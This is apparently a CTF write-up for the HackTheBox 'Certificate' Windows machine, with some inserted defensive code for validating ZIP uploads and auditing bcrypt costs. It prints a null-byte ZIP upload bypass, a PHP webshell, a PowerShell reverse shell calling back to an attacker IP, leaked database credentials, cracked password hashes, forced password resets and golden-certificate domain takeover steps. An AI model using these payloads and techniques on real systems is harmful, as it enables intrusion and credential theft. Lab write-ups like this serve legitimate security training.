HackTheBox Certificate Writeup
A walkthrough of the HackTheBox 'Certificate' machine, an easy-rated Windows box. This write-up covers initial access, privilege escalation, and post-exploitation techniques.
RECONNAISSANCE
Nmap
┌──(dollarboysushil㉿kali)-[~/Documents/HTB_BOXES/certificate]
└─$ nmap -sC -sV 10.129.183.231
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-01 03:00 EDT
Stats: 0:01:02 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 92.31% done; ETC: 03:01 (0:00:04 remaining)
Nmap scan report for 10.129.183.231
Host is up (0.27s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
|_http-title: Did not follow redirect to http://certificate.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-01 15:00:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T15:01:58+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-06-01T15:01:57+00:00; +8h00m02s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
|_ssl-date: 2025-06-01T15:01:58+00:00; +8h00m03s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T15:01:57+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Not valid before: 2024-11-04T03:14:54
|_Not valid after: 2025-11-04T03:14:54
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Hosts: certificate.htb, DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Let's enumerate the low-hanging fruit first, i.e. HTTP on port 80.
This challenge is currently active on HackTheBox.
In accordance with HackTheBox's content policy, this writeup will be made publicly available only after the challenge is retired.
Visiting the IP redirects us to certificate.htb, so add it to /etc/hosts.
The website certificate.htb is some kind of learning management system. It has register and login features, so let's create an account and log in.
After signing in, we have the option to enroll in any of the courses.
After enrolling in a course, we have the option to upload and submit an assignment (maybe a file upload vulnerability).
The website accepts a .zip archive with a valid .pdf, .docx, .pptx or .xlsx file inside it.
At first I tried uploading a normal zip file with a sample PDF inside. After uploading the zip, we got a link to the uploaded .pdf file, so the web app extracts the zip and gives us the location where the .pdf is stored.
With this in mind, I tried to bypass the file upload check using a null byte, and it worked. Here are the steps.
- Created a PHP reverse shell named shell.php.
- Compressed it into a ZIP archive using:
zip shell.zip shell.php
- Wrote a Python script to modify the filename inside the ZIP to shell.php\x00.pdf, attempting a null byte injection.
- Since null bytes (\x00) are not allowed in ZIP filenames or filesystems, the actual filename inside the new ZIP (shell2.zip) became:
shell.php .pdf
- Uploaded shell2.zip to the web application.
- The server extracted the file and saved it as:
shell.php .pdf
Python code
import zipfile

zip_path = 'shell.zip'
new_zip_path = 'shell2.zip'
old_filename = 'shell.php'
new_filename = 'shell.php\x00.pdf'

with zipfile.ZipFile(zip_path, 'r') as zip_read:
    with zipfile.ZipFile(new_zip_path, 'w') as zip_write:
        for item in zip_read.infolist():
            original_data = zip_read.read(item.filename)
            # Rename the target file. Setting item.filename directly keeps the
            # null byte, which the ZipInfo constructor would otherwise strip.
            if item.filename == old_filename:
                item.filename = new_filename
            # Write the entry into the new archive with its (possibly renamed) header
            zip_write.writestr(item, original_data)

print(f'Renamed {old_filename} to {new_filename} inside {new_zip_path}')
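The bypass works because the upload check and the extraction step disagree about where the file name ends. As an added example (not code from the original post, and written in Python rather than the app's PHP), here is a server-side check that rejects ZIP entries with control characters, traversal paths or stacked extensions before anything is extracted; the allow-list is the one the page describes, and `build_zip` is only a helper to construct sample uploads.

```python
import io
import posixpath
import zipfile
from typing import Dict, List, Optional, Tuple

# Extensions the upload feature is described as accepting.
ALLOWED_EXT = {".pdf", ".docx", ".pptx", ".xlsx"}


def entry_problem(name: str) -> Optional[str]:
    """Return why a ZIP entry name is unsafe, or None if it is acceptable."""
    # NUL or any other control byte must never reach a filesystem call: a check
    # that stops at the first NUL may see ".pdf" while the extractor writes "shell.php".
    if any(ord(c) < 0x20 or c == "\x7f" for c in name):
        return "control character in name"
    norm = posixpath.normpath(name.replace("\\", "/"))
    # Absolute paths, drive letters and leading ".." segments are zip-slip attempts.
    if norm.startswith("/") or ":" in norm or norm == ".." or norm.startswith("../"):
        return "path traversal or absolute path"
    root, ext = posixpath.splitext(posixpath.basename(norm))
    if ext.lower() not in ALLOWED_EXT:
        return "extension %r not allowed" % ext
    # Exactly one extension: "shell.php.pdf" can be handled as PHP by some server configs.
    if "." in root:
        return "multiple extensions"
    return None


def validate_zip(data: bytes) -> List[Tuple[str, str]]:
    """Return (entry_name, reason) for every rejected entry; an empty list means accept."""
    problems = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            # zipfile itself truncates info.filename at the first NUL, so validate
            # orig_filename: the name exactly as stored in the central directory.
            why = entry_problem(info.orig_filename)
            if why:
                problems.append((info.orig_filename, why))
    return problems


def build_zip(entries: Dict[str, bytes]) -> bytes:
    """Build an in-memory ZIP from constructed entries (test input only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            info = zipfile.ZipInfo(name)
            info.filename = name  # bypass ZipInfo's NUL truncation, as the write-up's script does
            zf.writestr(info, content)
    return buf.getvalue()
```

Checking `orig_filename` rather than `filename` is the whole point: a validator that reads the already-truncated name would accept the archive and the extractor would then write shell.php.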
Content of shell.php
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
After uploading the PHP file, we get the URL of the .php file, on which we can try RCE.
To get a reverse shell, I changed the content of shell.php to:
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('10.10.15.16',9001); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>
Now I have access as user xamppuser.
Upon further exploration, I found db.php inside C:\xampp\htdocs\certificate.htb
<?php
// Database connection using PDO
try {
    $dsn = 'mysql:host=localhost;dbname=Certificate_WEBAPP_DB;charset=utf8mb4';
    $db_user = 'certificate_webapp_user'; // Change to your DB username
    $db_passwd = 'cert!f!c@teDBPWD'; // Change to your DB password
    $options = [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ];
    $pdo = new PDO($dsn, $db_user, $db_passwd, $options);
} catch (PDOException $e) {
    die('Database connection failed: ' . $e->getMessage());
}
?>
Using the database credentials found in db.php, I logged into the database and dumped the contents of the users table.
id first_name last_name username email password created_at role is_active
1 Lorra Armessa Lorra.AAA [email protected] $2y$04$bZs2FUjVRiFswY84CUR8ve02ymuiy0QD23XOKFuT6IM2sBbgQvEFG 2024-12-23 12:43:10 teacher 1
6 Sara Laracrof Sara1200 [email protected] $2y$04$pgTOAkSnYMQoILmL6MRXLOOfFlZUPR4lAD2kvWZj.i/dyvXNSqCkK 2024-12-23 12:47:11 teacher 1
7 John Wood Johney [email protected] $2y$04$VaUEcSd6p5NnpgwnHyh8zey13zo/hL7jfQd9U.PGyEW3yqBf.IxRq 2024-12-23 13:18:18 student 1
8 Havok Watterson havokww [email protected] $2y$04$XSXoFSfcMoS5Zp8ojTeUSOj6ENEun6oWM93mvRQgvaBufba5I5nti 2024-12-24 09:08:04 teacher 1
9 Steven Roman stev [email protected] $2y$04$6FHP.7xTHRGYRI9kRIo7deUHz0LX.vx2ixwv0cOW6TDtRGgOhRFX2 2024-12-24 12:05:05 student 1
10 Sara Brawn sara.b [email protected] $2y$04$CgDe/Thzw/Em/M4SkmXNbu0YdFo6uUs3nB.pzQPV.g8UdXikZNdH6 2024-12-25 21:31:26 admin 1
12 Sushil Poudel sushil [email protected] $2y$04$QQb9r7j09fjYLOFSf.x9Xe768MQSkRtvqt9KJ1W38TkYbi4nQK.Z. 2025-06-02 10:15:03 student 1
Among the above password hashes, I was able to crack the hash of user sara.b using hashcat (mode 3200 is bcrypt).
hashcat -m 3200 sara.b_hash /usr/share/wordlists/rockyou.txt
sara.b:Blink182
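The hash cracked quickly for a reason worth checking in any dump: the `$2y$04$` prefix means bcrypt with cost 4, so each guess costs 2^4 key-setup rounds instead of the 2^10 or more usually recommended. As an added example (not from the original post), here is a small audit that parses the bcrypt prefix and flags low-cost or non-bcrypt hashes; the sample rows are constructed, not the page's, and the cost floor of 10 is an assumed policy.

```python
import re
from typing import Iterable, List, Optional, Tuple

# bcrypt layout: $<variant>$<2-digit cost>$<22-char salt><31-char hash>, i.e. 53 chars after the last '$'.
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{53})$")
MIN_COST = 10  # assumed policy floor; the cost is log2 of the key-setup rounds


def bcrypt_cost(hash_str: str) -> Optional[int]:
    """Return the cost factor of a bcrypt hash, or None if it is not bcrypt."""
    m = BCRYPT_RE.match(hash_str)
    return int(m.group(2)) if m else None


def relative_effort(cost: int, target: int = MIN_COST) -> float:
    """How many times cheaper one guess is at `cost` than at `target` (2 ** (target - cost))."""
    return 2.0 ** (target - cost)


def weak_hashes(rows: Iterable[Tuple[str, str]], min_cost: int = MIN_COST) -> List[Tuple[str, Optional[int]]]:
    """Return (username, cost) for every row whose hash is not bcrypt or is below min_cost."""
    flagged = []
    for user, h in rows:
        cost = bcrypt_cost(h)
        if cost is None or cost < min_cost:
            flagged.append((user, cost))
    return flagged


# Constructed sample rows in the shape of the users table above (fake hashes, not the page's).
FAKE_BODY = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ"  # 53 filler characters
SAMPLE_ROWS = [
    ("sara.b", "$2y$04$" + FAKE_BODY),                 # cost 4, like the dump in the write-up
    ("alice", "$2b$12$" + FAKE_BODY),                  # cost 12, acceptable
    ("legacy", "5f4dcc3b5aa765d61d8327deb882cf99"),    # plain hex digest, not bcrypt at all
]

if __name__ == "__main__":
    for user, cost in weak_hashes(SAMPLE_ROWS):
        print(f"{user}: cost={cost}, guess is {relative_effort(cost or 0):g}x cheaper than cost {MIN_COST}")
```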
User.txt
Using the credentials of user sara.b, I checked whether there was any interesting access to SMB shares, but nothing interesting was there.
Bloodhound
Using netexec's bloodhound module, I dumped the domain data and imported it into BloodHound CE.
After a little exploration in the BloodHound GUI, we can see that user sara.b has GenericAll permission over tons of objects.
Among those objects, I focused on user lion.sk. Using the GenericAll permission, I force-changed the password of user lion.sk:
net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"
User lion.sk has access to WinRM, so I logged in using evil-winrm and got user.txt.
Privilege Escalation
This user, lion.sk, has the following permissions.
*Evil-WinRM* PS C:\Users\Lion.SK\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
certificate\lion.sk S-1-5-21-515537669-4223687196-3249690583-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CERTIFICATE\Domain CRA Managers Group S-1-5-21-515537669-4223687196-3249690583-1104 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
There is nothing interesting here. I tried multiple privilege escalation techniques with this user but could not find a way, so I focused on another user.
Previously we saw that user sara.b has GenericAll permission over multiple objects, so I focused on another user, ryan.k.
Similarly as before, I force-changed the password of ryan.k and got a WinRM session.
This user has interesting permissions compared to lion.sk:
*Evil-WinRM* PS C:\Users\Ryan.K\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
certificate\ryan.k S-1-5-21-515537669-4223687196-3249690583-1117
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CERTIFICATE\Domain Storage Managers Group S-1-5-21-515537669-4223687196-3249690583-1118 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================ =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
SeManageVolumePrivilege
A little bit of Google searching led me to this exploit for SeManageVolumePrivilege.
Another interesting thing we can view in BloodHound CE is that from DC01 we have GenericWrite + other permissions over Certificate-ltd-ca.
So, I downloaded the SeManageVolumePrivilege exploit, uploaded it to the victim and ran it.
Using the exploit, I was able to export the PFX key of the CA:
certutil -exportPFX "Certificate-LTD-CA" ca.pfx
This is the golden certificate. Using this certificate we can fully compromise the domain: we can simply forge a ticket for any user in the domain.
Let's forge the ticket for administrator.
With the NTLM hash of administrator, we can get a WinRM session and grab root.txt.